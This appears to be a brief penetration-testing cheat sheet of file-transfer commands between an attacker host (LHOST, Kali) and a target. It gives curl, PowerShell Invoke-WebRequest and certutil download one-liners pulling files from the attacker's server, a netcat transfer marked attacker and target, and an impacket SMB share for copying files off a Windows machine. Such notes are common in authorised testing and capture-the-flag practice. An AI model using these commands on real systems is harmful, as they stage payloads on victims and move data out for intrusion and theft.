curl http://<LHOST>/<FILE> > <OUTPUT_FILE>
powershell -command Invoke-WebRequest -Uri http://<LHOST>:<LPORT>/<FILE> -Outfile C:\\temp\\<FILE>
iwr -uri http://lhost/file -Outfile file
certutil -urlcache -split -f "http://<LHOST>/<FILE>" <FILE>
File transfer using Netcat
#Attacker
nc <target_ip> 1234 < nmap
#Target
nc -lvp 1234 > nmap
# Kali
impacket-smbserver -smb2support <sharename> .
# Win
copy file \\KaliIP\sharename